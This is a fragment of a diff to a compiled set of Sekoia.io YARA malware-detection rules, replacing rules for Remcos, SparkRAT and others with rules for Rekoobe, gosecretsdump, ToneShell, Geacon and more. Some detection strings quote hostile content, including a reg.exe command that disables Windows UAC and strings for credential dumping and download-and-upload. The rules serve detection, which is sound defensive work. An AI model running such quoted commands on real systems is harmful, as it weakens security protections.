-		uint16( 0 ) == 0x5A4D and ( ( $zka and 3 of ( $str* ) ) or ( all of ( $str* ) ) ) and filesize < 1MB
+		filesize < 1KB and all of them
 }
 
-rule SEKOIA_Hacktool_Win_Gmer : FILE
+rule SEKOIA_Apt_Apt31_Rekoobe : FILE
 {
 	meta:
-		description = "Dtect the GMER hacktool based string and UPX usage"
+		description = "Find Rekoobe sample via Trend Elf Hash (telfhash)"
 		author = "Sekoia.io"
-		id = "d2f1aba1-4222-45e5-95bd-4d7f08595cea"
-		date = "2022-09-09"
+		id = "b1461a72-76ce-4cc5-ac84-3cc87454d288"
+		date = "2023-07-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_win_gmer.yar#L3-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dbd4e97c343dcb14c6e814afa820a9fbb5aa4290c7ddf9d864029bb35bb96dbf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt31_rekoobe.yar#L3-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "88a1a10f26ca355c4be3fd3aa914b1b1ea743018ce44c68a2f4d9e5a337d5c01"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$pac = "IDI_GMER" wide
-		$str0 = "---- Processes - GMER %s ----" ascii
-		$str1 = "E:\\projects\\cpp\\gmer\\Release\\gmer.pdb" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $pac and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "UPX0" ) ) or any of ( $str* ) ) and filesize < 900KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 100KB and elf.telfhash ( ) == "t18fc080c7c6b56a34a7f32538ac7c407982035e1581561b207f50c955d93b408404c5ef"
 }
-rule SEKOIA_Rat_Win_Remcos : FILE
+rule SEKOIA_Tool_Win_Gosecretsdump : FILE
 {
 	meta:
-		description = "DEPRECATED : Find Remcos RAT samples based on specific strings"
+		description = "Finds gosecretsdump EXE based on strings"
 		author = "Sekoia.io"
-		id = "011132f5-c5d9-4e97-bfed-0b94c9a30481"
-		date = "2023-01-29"
+		id = "9225fe95-e37c-48ff-b5b5-680f255349bd"
+		date = "2024-06-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_remcos.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "259f31d745449dc81cde698bb0ae4a20b4bbf050a1c818fbb5a891f26ca2e856"
+		reference = "https://github.com/C-Sto/gosecretsdump/releases"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_gosecretsdump.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "957b0deae745e4fda5a790acc391cebf9d193efb2a19ad5eb18c54da8c17bcfa"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-01-08"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" ascii
-		$str02 = "Disconnection occurred, retrying to connect..." ascii
-		$str03 = "[Following text has been pasted from clipboard:]" ascii
-		$str04 = "[Following text has been copied to clipboard:]" ascii
-		$str05 = "[Chrome StoredLogins found, cleared!]" ascii
-		$str06 = "PING 127.0.0.1 -n 2" ascii
-		$str07 = "Remcos_Mutex_Inj" ascii
-		$str08 = " * REMCOS v" ascii
-		$str09 = "Connected to C&C!" ascii
-		$str10 = "[Cleared all cookies & stored logins!]" ascii
+		$str01 = "github.com/C-Sto/gosecretsdump" ascii
+		$str02 = "/pkg/esent" ascii
+		$str03 = "/pkg/ditreader" ascii
+		$str04 = "/pkg/samreader" ascii
+		$str05 = "ntdsFileLocation" ascii
+		$str06 = "NTDSLoc" ascii
+		$str07 = "SAMEntries" ascii
+		$str08 = "SAMHashAES" ascii
+		$str09 = "NTLMHash" ascii
+		$str10 = "HasNoLMHashPolicy" ascii
+		$str11 = "PreviousIncBackup" ascii
+		$str12 = "Esent_record" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SEKOIA_Tool_Gost_Tunnel_Strings : FILE
+rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
 {
 	meta:
-		description = "Detects GOST Go Tunnel, based on strings"
+		description = "Detects decryption routine prologue of sysupdate samples"
 		author = "Sekoia.io"
-		id = "2de7aae9-9cf8-4007-aa27-5caea4123713"
-		date = "2023-02-28"
+		id = "97df4700-de35-49a0-869e-ed89a6d9cbdd"
+		date = "2022-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_gost_tunnel_strings.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eba1557acc1d9f16817a4bcd24631334a12357e45ad23f1c333de686f20f9291"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/luckymouse_sysupdate_payload.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e8501a50c65330153e613ae5bd6bbfbe4372d85175c3ed81d202ec5f177a94be"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234923,38 +235770,24 @@ rule SEKOIA_Tool_Gost_Tunnel_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".(*shadowUDPHandler).transportUDP" ascii
-		$ = ".(*quicCipherConn).decrypt" ascii
-		$ = ".(*socks4aConnector).ConnectContext.func1" ascii
-		$ = ".(*mtlsTransporter).Handshake" ascii
-		$ = ".(*FIFOStrategy).Apply" ascii
-		$ = ".dnsTCPExchanger" ascii
-		$ = ".dohResponseWriter" ascii
-		$ = ".tcpRemoteForwardListener" ascii
-		$ = ".shadowUDPPacketConn" ascii
-		$ = ".sshTunnelListener" ascii
-		$ = "/listener/rtcp/listener.go" ascii
-		$ = "/handler/unix/handler.go" ascii
-		$ = "/handler/tunnel/tunnel.go" ascii
-		$ = "/internal/net/proxyproto/listener.go" ascii
-		$ = "/internal/util/serial/conn.go" ascii
-		$ = "github.com/go-gost/x" ascii
+		$s1 = { DB ?? ?? C9 66 B9 ?? ?? E8 FF FF FF FF }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcefaedfe or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xbebafeca ) and 5 of them
+		filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
+
+rule SEKOIA_Apt_Sofacy_Graphitemalware_Generic : FILE
 {
 	meta:
-		description = "Detects ToddyCat's ToddyBox binary"
+		description = "Detects APT28 graphite malware based on strings"
 		author = "Sekoia.io"
-		id = "fde3df24-ebd7-4327-998e-bddaa08835da"
-		date = "2023-11-20"
+		id = "6b51cfa3-4a7d-4c2a-9fd9-f129b8a18466"
+		date = "2022-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_toddycat_toddybox_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b71fad12d4485268cbeff98b8a8d6067ac8f62164be60cdb61f3f37ab471a247"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sofacy_graphitemalware_generic.yar#L3-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f4c994c36768bae6d6e3b5aeefb634e485ab7b483a693781f29d5ff44c71996f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234962,88 +235795,121 @@ rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Wait a while to upload the next file..."
-		$ = "[-] Error Msg: %s"
-		$ = "[-] Error Msg: Connect Errors or Proxy Errors"
-		$ = "[-] arg missing!"
-		$ = "[-] Get module dir failed!"
-		$ = "[-] Dir error!"
-		$ = "Auto Get Proxy %S"
-		$ = "Dropbox-API-Arg"
+		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider" wide
+		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)" wide
+		$ = "%s %04d sp%1d.%1d %s"
+		$ = "%s%c%s%c%s"
+		$ = "InternetReadFile"
+		$ = "ObtainUserAgentString"
+		$ = "CryptImportKey"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and ( all of them or pe.imphash ( ) == "c56c322548250651361aef7dacf93eaf" )
 }
-rule SEKOIA_Apt_Uac0099_Lonepage : FILE
+rule SEKOIA_Apt_Toneshell_Loader : FILE
 {
 	meta:
-		description = "Detects LonePage vbs malware"
+		description = "Detects loader of ToneShell (exception based)"
 		author = "Sekoia.io"
-		id = "007f62f5-da5c-4df7-8b5c-5ed815ce6993"
-		date = "2024-01-08"
+		id = "b4bf284b-cab6-455e-a1c1-ad341d43bfdd"
+		date = "2024-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uac0099_lonepage.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "479f438acb63c76e09722640b973e76d1f1924bf24db477ca6898d123091d5f8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_toneshell_loader.yar#L1-L40"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "41e0d172d900344a3692b88fff7527d9"
+		hash = "782cf7183735935f3f7aad041cec3184"
+		hash = "97c1f436028c58b51d4c92ee9c9ce424"
+		hash = "d6c771f2afd8ce35e8727f95f3a3c6c4"
+		hash = "b8520c5bad88ade394086cb7b1b7b631"
+		hash = "0b3e8571e70a32490da19f6b3283151c"
+		hash = "f6784c65ee115a9ae4c0fb03e0045285"
+		hash = "38888696e5223c77f5f8680922396123"
+		hash = "b52d0707e4e5d5c0d5fd5f5a177ba712"
+		hash = "fd54c6d17ff91640b377ff41353efdaa"
+		hash = "a6efe263acc794a212647a96e52ddf1f"
+		hash = "6e8c80c5f2f9a1da504618e984d2a56c"
+		hash = "0839666697ccc562a9c1fe77d6755931"
+		hash = "f367f2fe580e556176b60da202c742a5"
+		hash = "e8b2fcc14494ada2f28d1f6ecd2521a2"
+		hash = "c08589e10812cc7d636dcbe2a36d43b4"
+		hash = "fa848a05cfecc0c25cd21364c9516584"
+		hash = "be231f7879d8d2159b67b7f277527268"
+		hash = "2acd8b48202dcc30d88a871370c4f37a"
+		hash = "72963bfc2837695f038680471d4f061c"
+		logic_hash = "40e1b918a4d83a4918260d8b1cc56e5097665a366f94bd5068e4ae519e3a681b"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "dim r, c" ascii fullword
-		$s1 = "= createobject(\"WScript.Shell\")" ascii fullword
-		$s2 = "r.Run c, 0, false" ascii fullword
-		$t1 = "GetHostAddresses" ascii fullword nocase
-		$t2 = "upgrade.txt" ascii fullword nocase
-		$t3 = "net.webclient" ascii fullword nocase
-		$t4 = "downloaddata" ascii fullword nocase
-		$t5 = "[System.Environment]::NewLine" ascii fullword nocase
-		$t6 = ".uploaddata('" ascii nocase
+		$exception = {00 00 00 00 2e 44 00 00}
+		$code = {02 00 00 00 66 89 96}
+		$kernel32 = "Kernel32.dll" wide
+		$outputdbgstr = "OutputDebugStringA"
+		$content = "ResetEvent"
 
 	condition:
-		true and filesize < 10KB and ( ( $s1 at 0x10 and $s0 at 0 and $s2 and 2 of ( $t* ) ) or ( all of ( $t* ) and any of ( $s* ) ) )
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 2MB
 }
-rule SEKOIA_Win_Malware_Janelarat_Strings : FILE
+rule SEKOIA_Hacktool_Mimilite : FILE
 {
 	meta:
-		description = "Detect the JanelaRAT malware"
+		description = "Detects Mimilite"
 		author = "Sekoia.io"
-		id = "891f182e-8a7a-4d0c-a481-62c198bb901b"
-		date = "2023-08-11"
+		id = "abb92a9d-0978-4ef2-b2cc-53ce6e83e3e4"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_malware_janelarat_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "00df0a1f037e24ff1528d524fb7398735e2c3e0a9995a9f95a5293b04748f06e"
-		logic_hash = "cf2ca92cf790211f69ea9645f1c1b865d5503d14a1dcce535b4a69c735ea3dad"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_mimilite.yar#L1-L37"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "504bc58e1c4143cc2322d564b637b0e014a4ead44f56a75fe1202b0d0a2e8bbc"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s2 = {4d 58 4e 4f 42 55 47 4d 41 47}
-		$s1 = "block.blq" wide
+		$chunk = {
+        FF C7
+        48 63 D7
+        46 0F B6 04 22
+        41 03 F0
+        81 E6 ?? ?? ?? ??
+        7D ??
+        FF CE
+        81 CE ?? ?? ?? ??
+        FF C6
+        48 63 CE
+        42 0F B6 04 21
+        42 88 04 22
+        46 88 04 21 }
+		$imp1 = "CryptGetHashParam"
+		$imp2 = "CryptDestroyHash"
+		$imp3 = "CryptHashData"
+		$imp4 = "CryptReleaseContext"
+		$imp5 = "CryptCreateHash"
+		$imp6 = "CryptAcquireContextA"
+		$imp7 = "VirtualAlloc"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 1MB and 2 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $imp* ) and $chunk
 }
-rule SEKOIA_Tool_Tacticalrmm_Installer_Strings : FILE
+rule SEKOIA_Koi_Koiloader : FILE
 {
 	meta:
-		description = "Detects TacticalRMM installer"
+		description = "Detects Koi Loader"
 		author = "Sekoia.io"
-		id = "c4a0ba33-b458-4c2a-abfa-4c33481d6491"
-		date = "2024-05-23"
+		id = "b8289d78-42de-4919-b2c5-3c926ddd8043"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_tacticalrmm_installer_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0f8d66eb1c9c6ed9571a1dd7de05072aec6d3cda874618889d4fd51e5965bb26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/koi_koiloader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7b4f12b0dec3927a46db1c8b2163e54a0a515d2b7360ba94647097fecf3d4653"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235051,93 +235917,51 @@ rule SEKOIA_Tool_Tacticalrmm_Installer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "TacticalRMMInstaller" ascii
-		$ = "tacticalagent-" ascii
-		$ = "tactical/go" ascii
-		$ = "tacticalrmm." ascii
+		$s2 = "%d|%s|%.16s|" ascii wide
+		$s3 = "Release" ascii wide
+		$s4 = "%s|%d.%d (%d)|%S|%S|%S" ascii wide
+		$s5 = "InitiateSystemShutdownExW" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 3MB and filesize < 8MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
 }
-rule SEKOIA_Backdoor_Mul_Sparkrat : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Variant : FILE
 {
 	meta:
-		description = "Detect SparkRAT using string found in the source code"
+		description = "Detects PowerShower"
 		author = "Sekoia.io"
-		id = "cd818207-f8ec-41fa-abef-c29d481c7897"
-		date = "2023-01-30"
+		id = "416d0cb0-bc59-47ae-8a98-d7b39f8108ab"
+		date = "2023-12-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/XZB-1248/Spark"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_mul_sparkrat.yar#L1-L59"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "377fc647e9a7ee6d5ad69370d5a2264302215401417951432f904c25e26169b9"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powershower_variant.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7bcfafd5a52d685fe33715c8c3725d95947c65863902fde05cf85685a6bfeab8"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "2006/01/02 15:04:05" wide ascii
-		$ = "can not find secret header" wide ascii
-		$ = "${i18n|COMMON.UNKNOWN_ERROR}" wide ascii
-		$ = "/api/client/update" wide ascii
-		$ = "application/octet-stream" wide ascii
-		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
-		$ = "no IP address found" wide ascii
-		$ = "failed to read network io counters" wide ascii
-		$ = "failed to read cpu info" wide ascii
-		$ = "PING" wide ascii
-		$ = "OFFLINE" wide ascii
-		$ = "LOCK" wide ascii
-		$ = "LOGOFF" wide ascii
-		$ = "HIBERNATE" wide ascii
-		$ = "SUSPEND" wide ascii
-		$ = "RESTART" wide ascii
-		$ = "SHUTDOWN" wide ascii
-		$ = "SCREENSHOT" wide ascii
-		$ = "TERMINAL_INIT" wide ascii
-		$ = "TERMINAL_INPUT" wide ascii
-		$ = "TERMINAL_RESIZE" wide ascii
-		$ = "TERMINAL_PING" wide ascii
-		$ = "TERMINAL_KILL" wide ascii
-		$ = "FILES_LIST" wide ascii
-		$ = "FILES_FETCH" wide ascii
-		$ = "FILES_REMOVE" wide ascii
-		$ = "FILES_UPLOAD" wide ascii
-		$ = "FILE_UPLOAD_TEXT" wide ascii
-		$ = "PROCESSES_LIST" wide ascii
-		$ = "PROCESS_KILL" wide ascii
-		$ = "DESKTOP_INIT" wide ascii
-		$ = "DESKTOP_PING" wide ascii
-		$ = "DESKTOP_KILL" wide ascii
-		$ = "DESKTOP_SHOT" wide ascii
-		$ = "COMMAND_EXEC" wide ascii
-		$ = "DEVICE_UPDATE" wide ascii
-		$ = "${i18n|COMMON.INVALID_PARAMETER}" wide ascii
-		$ = "${i18n|EXPLORER.FILE_OR_DIR_NOT_EXIST}" wide ascii
-		$ = "SPARK COMMIT: " wide ascii
-		$ = "${i18n|COMMON.DISCONNECTED}" wide ascii
-		$ = "${i18n|DESKTOP.NO_DISPLAY_FOUND}" wide ascii
-		$ = "/api/bridge/push" wide ascii
-		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
+		$s1 = "[System.Text.Encoding]::" ascii wide
+		$s2 = "{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}" ascii wide
 
 	condition:
-		17 of them and filesize > 4MB
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
+rule SEKOIA_Tool_Edrsandblast_Kernelcallbacks : FILE
 {
 	meta:
-		description = "Find loader module of Enigma Stealer based on specific strings"
+		description = "Detects EDRSandblast KernelCallbacks strings"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f01"
-		date = "2023-01-30"
+		id = "74cf4444-5bd6-4167-930a-5dbf2e529f92"
+		date = "2024-11-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_enigma_loader_module.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f1623c2f7c00affa3985cf7b9cdf25e39320700fa9d69f9f9426f03054b4b712"
-		logic_hash = "f5485b14291acc299d66b72aefd2d5e558d82f6a90450d293eb147f05423f2d8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_edrsandblast_kernelcallbacks.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ffb1185dca42c5b2b273c3a48f3ba86204a3474a9a045f72dbdb0ba7c9e89c7d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235145,32 +235969,25 @@ rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Enigma.Loader.Driver_x64.dll" ascii
-		$str02 = "C:\\projects\\driver\\Driver\\x64\\Release\\driver.pdb" ascii
-		$str03 = "/getFile?file_id=" ascii
-		$str04 = "/file/bot" ascii
-		$str05 = "Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." wide
-		$str06 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
-		$str07 = "Telegram request failed" wide
-		$str08 = "Vul driver data destroyed before unlink" wide
-		$str09 = "GetExportAddress hash not found: %x" wide
-		$str10 = "\\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\PnP Manager\\PnpManager" wide
+		$ = "[+] '%s' service ACL configured to for Everyone" wide
+		$ = "%s callback of EDR driver \"%s\" [callback addr: 0x%I64x" wide
+		$ = "[!] Could not resolve %s kernel module's address" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
 }
-rule SEKOIA_Hacktool_Socat_Strings : FILE
+rule SEKOIA_Implant_Macos_Geacon : FILE
 {
 	meta:
-		description = "Detects socat"
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "7c7e4085-39b2-445e-a9ff-52f21936e714"
-		date = "2023-12-08"
+		id = "a7784bfa-66a7-47df-b88b-d98217d8cca5"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_socat_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8f0c907fa2de4141c55073ea5b4a8174f50c716fc7a60d3e838115859a938084"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_macos_geacon.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "284574d185d3777a373f4a19e0870eec5245fb8ea5ebd6124bc281f8c74e0998"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235178,26 +235995,41 @@ rule SEKOIA_Hacktool_Socat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[options] <bi-address> <bi-address>"
-		$ = "version %s on %s"
-		$ = "socat_signal():"
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
+		uint32( 0 ) == 0xFEEDFACF and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Backdoor : FILE
+
+rule SEKOIA_Implant_Win_Lyceum : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane backdoor"
+		description = "Detect the DnsSystem malware used by Lyceum in March 2022"
 		author = "Sekoia.io"
-		id = "db2ad5a4-b592-4646-a385-c668bb2ea090"
-		date = "2024-11-22"
+		id = "e061562f-9c17-4ef4-b7f9-2c6708bb6570"
+		date = "2022-06-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gelsemium_wolfsbane_backdoor.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "1418fe9a743226b9661a2b6decb19db0"
-		logic_hash = "97d5076ca4c204a2e2276fd250d64bc140da1f2c8dec9996db7a622385f2c0ac"
+		reference = "https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_lyceum.yar#L4-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f6b4acf48877c1dd62fd2bfa19d701b0a79f052ec44fc5d4fe3dc7b02aa689c8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235205,28 +236037,24 @@ rule SEKOIA_Apt_Gelsemium_Wolfsbane_Backdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "udp_session"
-		$ = "session_interface"
-		$ = "plugin_persist"
-		$ = "Udp.cpp"
-		$ = "ikcp.c"
-		$ = "' %s 2>/dev/null"
+		$ = "$02c7afab-7f96-4dfa-b452-832e3624e270" ascii
+		$ = "C:\\Users\\u1\\Downloads\\Compressed\\article_src\\DnsDig\\DnsDig\\obj\\Release\\DnsDig.pdb" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize > 3MB and filesize < 4MB and 4 of them
